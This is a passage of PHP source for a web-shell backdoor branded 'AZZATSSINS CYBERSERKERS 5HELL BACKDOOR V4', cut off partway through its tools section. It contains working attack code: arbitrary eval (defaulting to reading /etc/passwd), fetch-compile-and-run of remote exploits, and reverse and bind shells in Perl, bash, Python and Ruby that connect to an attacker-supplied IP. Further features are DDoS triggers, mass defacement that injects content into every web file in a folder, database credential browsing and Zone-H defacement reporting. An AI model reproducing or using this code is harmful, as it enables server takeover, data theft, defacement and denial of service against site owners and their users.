  2163.  
  2164. margin-top:80px;
  2165.  
  2166. -webkit-border-radius: 10px;
  2167.  
  2168. -moz-border-radius: 10px;
  2169.  
  2170. border-radius: 10px;
  2171.  
  2172. border:3px solid #FFF5F5;
  2173.  
  2174. background-color:#080500;
  2175.  
  2176. overflow:auto;
  2177.  
  2178. }
  2179.  
  2180. #sshcmd{
  2181.  
  2182. width:450px;
  2183.  
  2184. background-color: #080500;
  2185.  
  2186. color:#28FE14;
  2187.  
  2188. border:none;
  2189.  
  2190. }
  2191.  
  2192.  
  2193.  
  2194. </style>
  2195.  
  2196. <body>
  2197. ';
  2198. echo "<fieldset><div id=menu><center><font color=silver><b><i>PRIV8 AZZATSSINS CYBERSERKERS 5HELL BACKDOOR V4</i></b></font><br><hr></center></div><br>";
  2199. ?>
  2200. <center>
  2201. <table border="1" width="100%" cellspacing="0" cellpadding="2">
  2202. <tr>
  2203.     <td align="center" rowspan=2>
  2204. <a href=mailto:azzatssinscyberserkers@gmail.com><img src=http://azzat.wap.mu/files/1049320/az-bn-idb.png width=100px height=90></a></td>
  2205.  
  2206. <? echo"<td><b><i><font color=aqua>
  2207. Server IP: ".gethostbyname($_SERVER["HTTP_HOST"])." <font color=red>|</font> Our IP: ".$_SERVER['REMOTE_ADDR']." <font color=red>|</font> PHP: ".phpversion()." <font color=red>|</font> Apache: ".$_SERVER['SERVER_SOFTWARE']." <font color=red>|</font> OS: ".php_uname()."</font></i></b>    </td>
  2208. ";?>
  2209.  
  2210. </tr>
  2211.  
  2212. <tr>
  2213. <td colspan="3"><font color=lime><b><i>[<a href="?">HOME</a>] [<a href="?action=files">FILE MANAGER</a>] [<a href="?turnoff=ini">BYPASS SAFE_MODE</a>] [<a href="?bypass=user">USERS</a>] [<a href="?action=upload">UPLOAD</a>] [<a href="?action=encoders">ENCODERS</a>] [<a href="?action=bind">BIND</a>] [<a href="?action=exploit">EXPLOIT</a>] [<a href="?configs=grabber">CONFIG</a>] [<a href="?sym=links">SYMBOLIC</a> <a href="?action=symlink" onclick="alert('The window will load and load\nAccess the tool by going to site.com:13123')">LINK</a>] [<a href="?action=eval">EVAL</a>] [<a href="?action=mass">MASS</a> <a href="?m=d">DEFACE</a>] [<a href="?action=proc">PROC</a>] [<a href="?action=zone-h">ZONE-H</a>] [<a href="?action=ddos">DDOS</a>] [<a href="?action=mysql&main=1">MYSQL</a>] [<a href="?action=tools">TOOLS</a>] [<a href="?action=phpinfo">PHPINFO</a>]</i></b></font></td>
  2214. </tr>
  2215. </table>
  2216. <br>
  2217. <div id="det">
  2218. <center><b><i>
  2219. <?php
  2220. if(ini_get('safe_mode') == '1'){
  2221. echo '<font color="orange"> Safe mode:</font><font color="red"> ON</font></font>';
  2222. }
  2223. else{
  2224. echo '<font color="orange"> Safe mode:</font><font color="green"> OFF</font>';
  2225. }
  2226. if(ini_get('magic_quotes_gpc') == '1'){
  2227. echo '<font color="orange"> Magic_quotes_gpc:</font><font color="red"> ON</font> <a href="?turnoff=magic_quotes_gpc"><font color="#00ff00">Turn off</a>';
  2228. }
  2229. else{
  2230. echo '<font color="orange"> Magic_quotes_gpc:</font><font color="green"> OFF</font>';
  2231. }
  2232. if(function_exists('mysql_connect')){
  2233. echo '<font color="orange"> Mysql:</font><font color="green"> ON</font>';
  2234. }
  2235. else{
  2236. echo '<font color="orange"> Mysql:</font><font color="red"> OFF</font>';
  2237. }
  2238. if(function_exists('mssql_connect')){
  2239. echo '<font color="orange"> Mssql:</font><font color="green"> ON</font>';
  2240. }
  2241. else{
  2242. echo '<font color="orange"> Mssql:</font><font color="yellow"> OFF</font>';
  2243. }
  2244. if(function_exists('pg_connect')){
  2245. echo '<font color="orange"> PostgreSQL:</font><font color="green"> ON</font>';
  2246. }
  2247. else{
  2248. echo '<font color="orange"> PostgreSQL:</font><font color="yellow"> OFF</font>';
  2249. }
  2250. if(function_exists('ocilogon')){
  2251. echo '<font color="orange"> Oracle:</font><font color="green"> ON</font>';
  2252. }
  2253. else{
  2254. echo '<font color="orange"> Oracle:</font><font color="yellow"> OFF</font>';
  2255. }
  2256. if(function_exists('curl_version')){
  2257. echo '<font color="orange"> Curl:</font><font color="green"> ON</font>';
  2258. }
  2259. else{
  2260. echo '<font color="orange"> Curl:</font><font color="red"> OFF</font>';
  2261. }
  2262. if(function_exists('exec')){
  2263. echo '<font color="orange"> Exec:</font><font color="green"> ON</font>';
  2264. }
  2265. else{
  2266. echo '<font color="orange"> Exec:</font><font color="red"> OFF</font>';
  2267. }
  2268. if(!ini_get('open_basedir') != "on"){
  2269. echo '<font color="orange"> Open_basedir:</font><font color="red"> OFF</font>';
  2270. }
  2271. else{
  2272. echo '<font color="orange"> Open_basedir:</font><font color="green"> ON</font>';
  2273. }
  2274. if(!ini_get('ini_restore') != "on"){
  2275. echo '<font color="orange"> Ini_restore:</font><font color="red"> OFF</font>';
  2276. }
  2277. else{
  2278. echo '<font color="orange"> Ini_restore:</font><font color="green"> ON</font>';
  2279. }
  2280. ?>
  2281. </i></b></center></div>
  2282. <div id="det">
  2283. <center><b><i>
  2284. <?php
  2285. echo '<font color="orange"> Disable_functions: </font>';
  2286. if(ini_get('disable_functions') == ''){
  2287. echo ' <font color="green"> None</font>';
  2288. }
  2289. else{
  2290. echo '<font color="red">';
  2291. echo ini_get('disable_functions');
  2292. echo '</font>';
  2293. }
  2294.  
  2295. echo'</div></i></b><br><a href=?jp=up>--------------------</a><br></center></fieldset>';
  2296.  
  2297.  
  2298. if(isset($_POST['source']) && isset($_POST['file'])){
  2299. $source = $_POST['source'];
  2300. $file = $_POST['file'];
  2301. $fp = fopen($file, 'w');
  2302. fwrite($fp, $source);
  2303. fclose($fp);
  2304. echo '<center><font color="green"><b>File saved</b></font></center>';
  2305. }
  2306. if(isset($_GET['turnoff'])){
  2307. if(is_writable(".htaccess")){
  2308. $value = $_GET['turnoff'];
  2309. if(file_exists(".htaccess")){
  2310. // fread example
  2311. $handle = fopen(".htaccess", "r");
  2312. $contents = '';
  2313. while (!feof($handle)) {
  2314. $read = fread($handle, 8192);
  2315. $contents = $contents.$read;
  2316. ?>
  2317. <center><span style="color: orange;font-family: ‘Courier New’, Courier, monospace;font-size:12px">Use htaccess to turn php.ini functions on/off<br>Example: php_value magic_quotes_gpc off</span></center>
  2318. <form action="" method="post">
  2319. <center><textarea cols="50" rows="10" id="source" name="source">
  2320. <?php
  2321. if($value == 'magic_quotes_gpc'){
  2322. $data = 'php_value magic_quotes_gpc off
  2323. '.$contents;
  2324. echo $data;
  2325. }
  2326. else{
  2327. echo $contents;
  2328. }
  2329.     ?>
  2330.     </textarea>
  2331.     <input type="hidden" name="file" value=".htaccess"><br>
  2332.     <input type="submit" value="Save File"></center>
  2333.     </form>
  2334.     <?php
  2335. }
  2336. fclose($handle);
  2337. }
  2338. }
  2339. if(!file_exists(".htaccess")){
  2340. // make htaccess file
  2341. $myfile = '.htaccess';
  2342. $handle = fopen($myfile, 'w') or die('Cannot open file:  '.$myfile);
  2343. fclose($handle);
  2344. echo '<center><font color="green"><b>File created</b></font> <a href="?turnoff=ini">click here</a></center>';
  2345. }
  2346. ?>
  2347. <?php
  2348. }
  2349. // make file
  2350. if(isset($_GET['make'])){
  2351. // file maker
  2352. if(!file_exists($_GET['make'])){
  2353. // make htaccess file
  2354. $myfile = $_GET['make'];
  2355. $handle = fopen($myfile, 'w') or die('Cannot open file:  '.$myfile);
  2356. fclose($handle);
  2357. echo '<center><font color="green"><b>File created</b></font> <a href="?view='.$myfile.'&dir=0">click here</a></center>';
  2358. }
  2359. else{
  2360. echo '<center><font color="red">This file exist.</font>&nbsp;&nbsp;&nbsp;&nbsp; <a href="?delete='.$_GET['make'].'">delete</a>&nbsp;&nbsp;&nbsp;&nbsp; <a href="?view='.$_GET['make'].'">open</a><center>';
  2361. }
  2362. }
  2363.  
  2364. if(isset($_GET['get'])){
  2365. // download
  2366. $file = $_GET['get'];
  2367. if (file_exists($file)) {
  2368.     header('Content-Description: File Transfer');
  2369.     header('Content-Type: application/octet-stream');
  2370.     header('Content-Disposition: attachment; filename='.basename($file));
  2371.     header('Content-Transfer-Encoding: binary');
  2372.     header('Expires: 0');
  2373.     header('Cache-Control: must-revalidate');
  2374.     header('Pragma: public');
  2375.     header('Content-Length: ' . filesize($file));
  2376.     ob_clean();
  2377.     flush();
  2378.     readfile($file);
  2379.     exit();
  2380. }
  2381. }
  2382.  
  2383. if(isset($_GET['view'])){
  2384. $file = $_GET['view'];
  2385. ?>
  2386. <center><form action="" method="post">
  2387. <textarea cols="50" rows="10" id="source" name="source">
  2388. <?php
  2389. if(file_exists($file)){
  2390. $open = htmlspecialchars(file_get_contents($file));
  2391. if($open){
  2392. echo $open;
  2393. }
  2394. }
  2395. else{
  2396. echo '              FILE DOES NOT EXISTS';
  2397. }
  2398. ?>
  2399. </textarea>
  2400. <input type="hidden" name="file" value="<?php echo $file; ?>"><br>
  2401. <center><input type="submit" value="Save File"> <a href="?zip=<?php echo $file; ?>" style="font-size:14;padding: 3px;border: 1px solid green;background: black;color: #00ff00;">Download</a> <a href="?delete=<?php echo $file; ?>&action=files" style="font-size:14;padding: 3px;border: 1px solid green;background: black;color: #00ff00;">Delete</a></center>
  2402. </form>
  2403. </center>
  2404. <?php
  2405. }
  2406.  
  2407. if(isset($_GET['action']) && $_GET['action'] == 'symlink'){
  2408. $a = fopen("lolz.pl", "w");
  2409. fputs($a, $symlink);
  2410. fclose($a);
  2411. system("perl lolz.pl");
  2412. }
  2413.  
  2414. if(isset($_GET['action']) && $_GET['action'] == 'ddos' && empty($_POST['ip'])){
  2415. ?>
  2416. <center>
  2417. <span style="font-family: Tahoma, Geneva, sans-serif;font-size: 12px; color: #333;">~<br />Ddos<br />~<br /></span>
  2418. <form action="" method="post">
  2419. <input type="text" value="http://site.com/" name="ip">
  2420. <input type="hidden" name="action" value="ddos">
  2421. <input type="submit">
  2422. <select style="width:60px" name="way">
  2423. <option>TCP</option>
  2424. <option>UDP</option>
  2425. </select>
  2426. </form>
  2427. </center>
  2428. <?php
  2429. }
  2430. if(isset($_GET['action']) && $_GET['action'] == 'ddos' && !empty($_POST['ip'])){
  2431. $url = $_POST['ip'];
  2432. if($_POST['way'] == "TCP"){
  2433. DDOSTcp($url);
  2434. }
  2435. else if($_POST['way'] == "UDP"){
  2436. DDOSUdp($url);
  2437. }
  2438. else{
  2439. echo 'No other methods.';
  2440. }
  2441. }
  2442.  
  2443. if(isset($_GET['action']) && $_GET['action'] == 'eval'){
  2444. ?>
  2445. <center>
  2446. <form action="" method="get">
  2447. <span style="font-family: Tahoma, Geneva, sans-serif;font-size: 12px; color: #333;">~<br />Eval<br />~<br /></span>
  2448. <input type="hidden" name="action" value="eval">
  2449. <input type="text" name="evalit" value="file_get_contents('/etc/passwd');"><input type="submit" value="Ex3cut3">
  2450. </form>
  2451. <?php
  2452. if(isset($_GET['evalit'])){
  2453. if(function_exists("system")){
  2454. $ev = $_GET['evalit'];
  2455. echo eval(stripslashes($ev));
  2456. }
  2457. else{
  2458. echo 'eval disabled';
  2459. }
  2460. }
  2461. echo '<center>';
  2462. }
  2463.  
  2464. if(isset($_GET['action']) && $_GET['action'] == 'exploit'){
  2465. ?>
  2466. <center>
  2467. <span style="font-family: Tahoma, Geneva, sans-serif;font-size: 12px; color: #333;">~<br />Get and execute<br />~<br /></span>
  2468. <form action="" method="get">
  2469. <input type="text" name="exp_url" value="http://site.com/exploit"> Type:
  2470. <select name="run">
  2471. <option>c++ | .cpp</option>
  2472. <option>python | .py</option>
  2473. <option>perl | .pl</option>
  2474. <option>ruby | .rb</option>
  2475. </select>
  2476. <input type="hidden" name="action" value="exploit">
  2477. <input type="submit" value="Ex3cut3">
  2478. </form>
  2479. </center>
  2480. <?php
  2481. }
  2482.  
  2483. if(isset($_GET['exp_url'])){
  2484. echo '<center>';
  2485. if(function_exists("wget")){
  2486. wget($_GET['exp_url']);
  2487. echo $_GET['exp_url'].' got in here';
  2488. if(function_exists("system")){
  2489.  
  2490. if(isset($_GET['run'])){
  2491. $run = $_GET['run'];
  2492. if($run = 'c++ | .cpp'){
  2493. system("gcc -o exploit ".$_GET['exp_url'].";chmod +x exploit;./exploit;");
  2494. }
  2495. if($run = 'perl | .pl'){
  2496. }
  2497. if($run = 'python | .py'){
  2498. }
  2499. if($run = 'ruby | .rb'){
  2500. }
  2501.  
  2502.  
  2503. }
  2504.  
  2505.  
  2506. }
  2507. else{
  2508. echo 'System command disabled';
  2509. }
  2510. }
  2511. else{
  2512. echo('wget disabled');
  2513. }
  2514. echo '</center>';
  2515. }
  2516.  
  2517. if(isset($_GET['action']) && $_GET['action'] == 'bind'){
  2518. if(!isset($_POST['port']) && empty($_POST['ip']) && empty($_POST['pyip']) && empty($_POST['rbip'])){
  2519. echo "<center>#1 ./perl<br>";
  2520. echo '<form action="?action=bind" method="post">
  2521. <input type="text" value="port" name="port"><br>
  2522. <input type="submit" value="Ex3cut3">
  2523. </form><br><br>#2 ./bash<form action="" method="post">
  2524. <input type="text" name="ip" value="ip"> <input type="text" name="theport" value="port" style="width:40px"><br>
  2525. <input type="submit" value="Ex3cut3"></form>
  2526. <br><br>#3 ./python<form action="" method="post">
  2527. <input type="text" name="pyip" value="ip"> <input type="text" name="pyport" value="port" style="width:40px"><br>
  2528. <input type="submit" value="Ex3cut3"></form>
  2529. <br><br>#4 ./ruby linux<form action="" method="post">
  2530. <input type="text" name="rbip" value="ip"> <input type="text" name="rbport" value="port" style="width:40px"><br>
  2531. <input type="submit" value="Ex3cut3"></form>
  2532. <br><br>#5 ./ruby win<form action="" method="post">
  2533. <input type="text" name="rbipw" value="ip"> <input type="text" name="rbportw" value="port" style="width:40px"><br>
  2534. <input type="submit" value="Ex3cut3"></form>
  2535. ';
  2536. }
  2537. else{
  2538. if(isset($_POST['port'])){
  2539. $bind = "
  2540. #!/usr/bin/perl
  2541.  
  2542. \$port = {$_POST['port']};
  2543. \$port = \$ARGV[0] if \$ARGV[0];
  2544. exit if fork;
  2545. $0 = \"updatedb\" . \" \" x100;
  2546. \$SIG{CHLD} = 'IGNORE';
  2547. use Socket;
  2548. socket(S, PF_INET, SOCK_STREAM, 0);
  2549. setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
  2550. bind(S, sockaddr_in(\$port, INADDR_ANY));
  2551. listen(S, 50);
  2552. while(1)
  2553. {
  2554.    accept(X, S);
  2555.    unless(fork)
  2556.    {
  2557.        open STDIN, \"<&X\";
  2558.        open STDOUT, \">&X\";
  2559.        open STDERR, \">&X\";
  2560.        close X;
  2561.        exec(\"/bin/sh\");
  2562.    }
  2563.    close X;
  2564. }
  2565. ";
  2566. $fp = fopen("bind.pl", "w");
  2567. fwrite($fp, $bind);
  2568. fclose($fp);
  2569. exec("perl bind.pl");
  2570. }
  2571.  
  2572.  
  2573. if(isset($_POST['rbip'])){
  2574.     $ip = $_POST['rbip'];
  2575.     $port = $_POST['rbport'];
  2576. $ruby = "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"".$ip."\",\"".$port."\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'";
  2577. $fp = fopen("bind.rb", "w");
  2578. fwrite($fp, $ruby);
  2579. fclose($fp);
  2580. exec("ruby bind.rb");
  2581. }
  2582.  
  2583. if(isset($_POST['rbipw'])){
  2584.     $ip = $_POST['rbipw'];
  2585.     $port = $_POST['rbportw'];
  2586. $ruby = "ruby -rsocket -e 'c=TCPSocket.new(\"".$ip."\",\"".$port."\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'";
  2587. $fp = fopen("bind_win.rb", "w");
  2588. fwrite($fp, $ruby);
  2589. fclose($fp);
  2590. exec("ruby bind_win.rb");
  2591. }
  2592.  
  2593. if(isset($_POST['pyip'])){
  2594.     $ip = $_POST['pyip'];
  2595.     $port = $_POST['pyport'];
  2596. $bind = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"".$ip."\",".$port."));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'";
  2597.  
  2598. $fp = fopen("bind.py", "w");
  2599. fwrite($fp, $bind);
  2600. fclose($fp);
  2601. exec("python bind.py");
  2602. }
  2603.  
  2604. if(isset($_POST['ip']) && !empty($_POST['theport'])) {
  2605. $ip = $_POST['ip'];
  2606. $port = $_POST['theport'];
  2607.  
  2608. if(function_exists('exec')){
  2609. echo 'Exec command not blocked,,,, continuing';
  2610. exec('0<&196;exec 196<>/dev/tcp/.$ip./.$port.; sh <&196 >&196 2>&196');
  2611. }
  2612. else{
  2613. echo 'Exec command is blocked blocked by admin';
  2614. }
  2615.  
  2616. }
  2617. }
  2618. echo '</center>';
  2619. }
  2620.  
  2621. if(isset($_GET['action']) && $_GET['action'] == 'proc'){
  2622. ?>
  2623. <textarea style="width:100%;height:100%;border:0;outline:none;margin:0;padding:0;color: orange;font-family: Tahoma, Geneva, sans-serif;font-size:12px;background:black;margin-left:30px;">
  2624. <?php
  2625. echo shell_exec("tasklist")."<br>";
  2626. ?>
  2627. </textarea>
  2628. <?php
  2629. }
  2630.  
  2631. if(isset($_GET['action']) && $_GET['action'] == 'mass'){
  2632.     if(!isset($_GET['code'])){
  2633.  
  2634. ?>
  2635.  
  2636. <?php
  2637. echo '<form action="" method="get">
  2638. <center>Mass deface script, php/html/htm/asp/aspx/js</center><input type="hidden" name="action" value="mass">
  2639. <textarea name="code" id="source">YOUR DEFACE PAGE HERE =)</textarea><br>
  2640. <center><font color="orange">Folder:</font> <input type="text" value="'.getcwd().'" name="dir" style="border-top:none;"><br><input type="submit" value="Ex3cut3" style="border-top:none;"></center>
  2641. </form>';
  2642. }
  2643. else{
  2644.  
  2645.     if (is_dir($_GET['dir'])) {
  2646.         $lolinject = $_GET['code'];
  2647.         foreach (glob($_GET['dir']."/*.php") as $injectj00) {
  2648.             $fp=fopen($injectj00,"a+");
  2649.             if (fputs($fp,$lolinject)){
  2650.                 echo $injectj00.' was injected<br>';
  2651.             } else {
  2652.                 echo '<font color=red>failed to inject '.$injectj00.'</font>';
  2653.             }
  2654.         }
  2655.         foreach (glob($_GET['dir']."/*.html") as $injectj00) {
  2656.             $fp=fopen($injectj00,"a+");
  2657.             if (fputs($fp,$lolinject)){
  2658.                 echo $injectj00.' was injected<br>';
  2659.             } else {
  2660.                 echo '<font color=red>failed to inject '.$injectj00.'</font>';
  2661.             }
  2662.         }
  2663.         foreach (glob($_GET['dir']."/*.htm") as $injectj00) {
  2664.             $fp=fopen($injectj00,"a+");
  2665.             if (fputs($fp,$lolinject)){
  2666.                 echo $injectj00.' was injected<br>';
  2667.             } else {
  2668.                 echo '<font color=red>failed to inject '.$injectj00.'</font>';
  2669.             }
  2670.         }
  2671.         foreach (glob($_GET['dir']."/*.asp") as $injectj00) {
  2672.             $fp=fopen($injectj00,"a+");
  2673.             if (fputs($fp,$lolinject)){
  2674.                 echo $injectj00.' was injected<br>';
  2675.             } else {
  2676.                 echo '<font color=red>failed to inject '.$injectj00.'</font>';
  2677.             }
  2678.         }
  2679.         foreach (glob($_GET['dir']."/*.js") as $injectj00) {
  2680.             $fp=fopen($injectj00,"a+");
  2681.             if (fputs($fp,$lolinject)){
  2682.                 echo $injectj00.' was injected<br>';
  2683.             } else {
  2684.                 echo '<font color=red>failed to inject '.$injectj00.'</font>';
  2685.             }
  2686.         }
  2687.         foreach (glob($_GET['dir']."/*.aspx") as $injectj00) {
  2688.             $fp=fopen($injectj00,"a+");
  2689.             if (fputs($fp,$lolinject)){
  2690.                 echo $injectj00.' was injected<br>';
  2691.             } else {
  2692.                 echo '<font color=red>failed to inject '.$injectj00.'</font>';
  2693.             }
  2694.         }
  2695.     } else { //end if inputted dir is real -- if not, show an ugly red error
  2696.         echo '<b><font color=red>'.$_GET['pathtomass'].' is not available!</font></b>';
  2697.     } // end if inputted dir is real, for real this time
  2698. }
  2699.  
  2700. }
  2701.  
  2702. if(isset($_GET['action']) && $_GET['action'] == 'encoders'){
  2703. ?>
  2704. <div id="commands"><center>
  2705. <h2>Enc0d3 ~ D3c0d3</h2>
  2706. <form action="" method="post">
  2707. <textarea style="color: #00ff00;background-color:#002d00;" name="code">code here</textarea><br>
  2708. <select name="encoded">
  2709. <option>Base64_encode</option>
  2710. <option>Base64_decode</option>
  2711. <option>Urlencode</option>
  2712. <option>Urldecode</option>
  2713. <option>Hash_md5</option>
  2714. <option>Hash_sha1</option>
  2715. <option>Hash_sha512</option>
  2716. </select><br>
  2717. <input type="submit" value="Ex3cut3">
  2718. </form>
  2719. <hr>
  2720. <textarea id="source">
  2721. <?php
  2722. if(isset($_GET['action']) && $_GET['action'] == 'encoders' && !empty($_POST['code']) && !empty($_POST['encoded'])){
  2723. $format = $_POST['encoded'];
  2724. $code = $_POST['code'];
  2725.  
  2726. if($format == 'Base64_encode'){
  2727. echo base64_encode($code);
  2728. }
  2729. if($format == 'Base64_decode'){
  2730. echo base64_decode($code);
  2731. }
  2732. if($format == 'Urlencode'){
  2733. echo urlencode($code);
  2734. }
  2735. if($format == 'Urldecode'){
  2736. echo urldecode($code);
  2737. }
  2738. if($format == 'Hash_md5'){
  2739. echo md5($code);
  2740. }
  2741. if($format == 'Hash_sha1'){
  2742. echo sha1($code);
  2743. }
  2744. if($format == 'Hash_sha512'){
  2745. echo hash('sha512', $code);
  2746. }
  2747.  
  2748. }
  2749. ?>
  2750. </textarea>
  2751. </center></div>
  2752.  
  2753. <?php
  2754. }
  2755.  
  2756. if(isset($_GET['action']) && $_GET['action'] == 'mysql' && !empty($_GET['main']) && $_GET['main'] == 1){
  2757.  
  2758. ?>
  2759. <div style="color:orange">
  2760. <center>
  2761. <form action="?action=mysql&main=2" method="post">
  2762. host <input type="text" name="host" value="localhost"><br>
  2763. user <input type="text" name="user" value="root"><br>
  2764. pass <input type="text" name="pass"><br>
  2765. <input type="submit" value="Ex3cut3">
  2766. </form></center></div>
  2767. <?php
  2768. }
  2769.  
  2770. if(isset($_GET['action']) && $_GET['action'] == 'mysql' && !empty($_GET['main']) && $_GET['main'] == 2){
  2771. $host = $_POST['host'];
  2772. $user = $_POST['user'];
  2773. $pass = $_POST['pass'];
  2774. mysql_connect($host, $user, $pass) or die('Not connected!');
  2775.  
  2776. $query = mysql_query('SHOW DATABASES');
  2777.  
  2778. echo '<div style="color:orange"><center><h2>Database</h2><form action="" method="get"><select name="db">';
  2779.                         while($rows=mysql_fetch_array($query)){
  2780.                             for($j=0;$j<mysql_num_fields($query);$j++)
  2781.                             {
  2782.  
  2783.                                 if($rows[$j] == "") $dataz = " ";
  2784.                                 else $dataz = $rows[$j];
  2785.                                 $result .= '<option>'.htmlspecialchars($dataz).'</option>';
  2786.                             }
  2787.                         }
  2788. echo $result;  
  2789. echo '</select><br><input type="hidden" value="'.$host.'" name="host"><input type="hidden" value="'.$user.'" name="user"><input type="hidden" value="'.$pass.'" name="pass"><input type="hidden" value="3" name="main"><input type="submit" value="Ex3cut3"></form></center></div>';
  2790. mysql_close();
  2791. }
  2792.  
  2793. if(isset($_GET['db']) && !empty($_GET['main']) && $_GET['main'] == 3){
  2794. $host = $_GET['host'];
  2795. $user = $_GET['user'];
  2796. $pass = $_GET['pass'];
  2797. mysql_connect($host, $user, $pass) or die('Not connected!');
  2798.  
  2799.  
  2800. $db = $_GET['db'];
  2801. $sql = "SHOW TABLES FROM ".$db;
  2802. $result = mysql_query($sql);
  2803. while ($row = mysql_fetch_row($result)) {
  2804.     echo '<a href="?action=mysql&main=4&db='.$db.'&host='.$host.'&user='.$user.'&pass='.$pass.'&table='.$row[0].'" id="table">&nbsp;&nbsp;'.$row[0].'&nbsp;&nbsp;</a>';
  2805. }
  2806. mysql_free_result($result);
  2807.  
  2808. mysql_close();
  2809. }
  2810.  
  2811. if(isset($_GET['db']) && !empty($_GET['main']) && $_GET['main'] == 4 && empty($_GET['column']) && !empty($_GET['table'])){
  2812. $host = $_GET['host'];
  2813. $user = $_GET['user'];
  2814. $pass = $_GET['pass'];
  2815. mysql_connect($host, $user, $pass) or die('Not connected!');
  2816. mysql_select_db($_GET['db']) or die('Unable to select db');
  2817.  
  2818. $query = mysql_query("SHOW COLUMNS FROM ".$_GET['table']);
  2819. while ($row = mysql_fetch_row($query)) {
  2820.     echo '<a href="?action=mysql&main=5&db='.$_GET['db'].'&host='.$host.'&user='.$user.'&pass='.$pass.'&table='.$_GET['table'].'&column='.$row[0].'" id="table">&nbsp;&nbsp;'.$row[0].'&nbsp;&nbsp;</a>';
  2821. }
  2822. mysql_free_result($query);
  2823. mysql_close();
  2824. }
  2825.  
  2826. if(isset($_GET['db']) && !empty($_GET['main']) && $_GET['main'] == 5 && !empty($_GET['column'])){
  2827. $host = $_GET['host'];
  2828. $user = $_GET['user'];
  2829. $pass = $_GET['pass'];
  2830. mysql_connect($host, $user, $pass) or die('Not connected!');
  2831. mysql_select_db($_GET['db']) or die('Unable to select db');
  2832.  
  2833. $query = mysql_query("SELECT ".$_GET['column']." FROM ".$_GET['table']);
  2834. echo "<textarea id=\"table\" style=\"width:100%;height:100%\">";
  2835. while($row = mysql_fetch_array($query)){
  2836. echo htmlspecialchars($row[$_GET['column']])."\n\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n";
  2837. }
  2838. echo "</textarea><br><br>   ";
  2839. }
  2840.  
  2841. // tools
  2842. if(isset($_GET['action']) && $_GET['action'] == 'zone-h' && !empty($_POST['hackmode'])){
  2843. if($_POST['SendNowToZoneH'])
  2844. {
  2845.     echo '<center>';
  2846.     ob_start();
  2847.     $sub = get_loaded_extensions();
  2848.     if(!in_array("curl", $sub)){die('[-] Curl Is Not Supported !! ');}
  2849.     $hacker = $_POST['defacer'];
  2850.     $method = $_POST['hackmode'];
  2851.     $neden = $_POST['reason'];
  2852.     $site = $_POST['domain'];
  2853.    
  2854.     if (empty($hacker)){die ("[-] You Must Fill the Attacker name !");}
  2855.     elseif($method == "--------SELECT--------") {die("[-] You Must Select The Method !");}
  2856.     elseif($neden == "--------SELECT--------") {die("[-] You Must Select The Reason");}
  2857.     elseif(empty($site)) {die("[-] You Must Inter the Sites List ! ");}
  2858.     $i = 0;
  2859.     $sites = explode("\n", $site);
  2860.     while($i < count($sites))
  2861.     {
  2862.         if(substr($sites[$i], 0, 4) != "http") {$sites[$i] = "http://".$sites[$i];}
  2863.         ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
  2864.         echo "Site : ".$sites[$i]." Defaced !\n";
  2865.         ++$i;
  2866.     }
  2867.     echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";
  2868. }
  2869.     echo '</center>';
  2870. }
  2871.  
  2872. if(isset($_GET['action']) && $_GET['action'] == 'zone-h'){
  2873. ?>
  2874. <center>
  2875. <table><tr>
  2876. <td style='background-color:#666;padding-left:10px;'><h2 style="color:#00cc00"><center>Zone-H Defacer</center></h2></td></tr><tr><td height='45' colspan='2'><form method="post">
  2877. <center><input type="text" name="defacer" value="AZZATSSINS" />
  2878. <select name="hackmode">
  2879. <option >--------SELECT--------</option>
  2880. <option value="1">known vulnerability (i.e. unpatched system)</option>
  2881. <option value="2" >undisclosed (new) vulnerability</option>
  2882. <option value="3" >configuration / admin. mistake</option>
  2883. <option value="4" >brute force attack</option>
  2884. <option value="5" >social engineering</option>
  2885. <option value="6" >Web Server intrusion</option>
  2886. <option value="7" >Web Server external module intrusion</option>
  2887. <option value="8" >Mail Server intrusion</option>
  2888. <option value="9" >FTP Server intrusion</option>
  2889. <option value="10" >SSH Server intrusion</option>
  2890. <option value="11" >Telnet Server intrusion</option>
  2891. <option value="12" >RPC Server intrusion</option>
  2892. <option value="13" >Shares misconfiguration</option>
  2893. <option value="14" >Other Server intrusion</option>
  2894. <option value="15" >SQL Injection</option>
  2895. <option value="16" >URL Poisoning</option>
  2896. <option value="17" >File Inclusion</option>
  2897. <option value="18" >Other Web Application bug</option>
  2898. <option value="19" >Remote administrative panel access bruteforcing</option>
  2899. <option value="20" >Remote administrative panel access password guessing</option>
  2900. <option value="21" >Remote administrative panel access social engineering</option>
  2901. <option value="22" >Attack against administrator(password stealing/sniffing)</option>
  2902. <option value="23" >Access credentials through Man In the Middle attack</option>
  2903. <option value="24" >Remote service password guessing</option>
  2904. <option value="25" >Remote service password bruteforce</option>
  2905. <option value="26" >Rerouting after attacking the Firewall</option>
  2906. <option value="27" >Rerouting after attacking the Router</option>
  2907. <option value="28" >DNS attack through social engineering</option>
  2908. <option value="29" >DNS attack through cache poisoning</option>
  2909. <option value="30" >Not available</option>
  2910. </select>
  2911.  
  2912. <select name="reason">
  2913. <option >--------SELECT--------</option>
  2914. <option value="1" >Heh...just for fun!</option>
  2915. <option value="2" >Revenge against that website</option>
  2916. <option value="3" >Political reasons</option>
  2917. <option value="4" >As a challenge</option>
  2918. <option value="5" >I just want to be the best defacer</option>
  2919. <option value="6" >Patriotism</option>
  2920. <option value="7" >Not available</option>
  2921. </select>
  2922. <input type="hidden" name="action" value="zone-h">
  2923. <textarea style="background:green;outline:none;" name="domain" cols="44" rows="9" id="domains">List Of Domains</textarea>
  2924. <br /><input type="submit" value="Send Now !" name="SendNowToZoneH" /></center>
  2925. </form></td></tr></table></form>
  2926. <!-- End Of Zone-H -->
  2927. </td></center>
  2928. <?php
  2929. }
  2930.  
  2931. if(isset($_GET['action']) && $_GET['action'] == 'tools'){
  2932. ?>
  2933. <div id="commands">
  2934. <div style="float:right">
  2935. <center>
  2936. <h2>Cloudflare</h2>
  2937. Ip finder
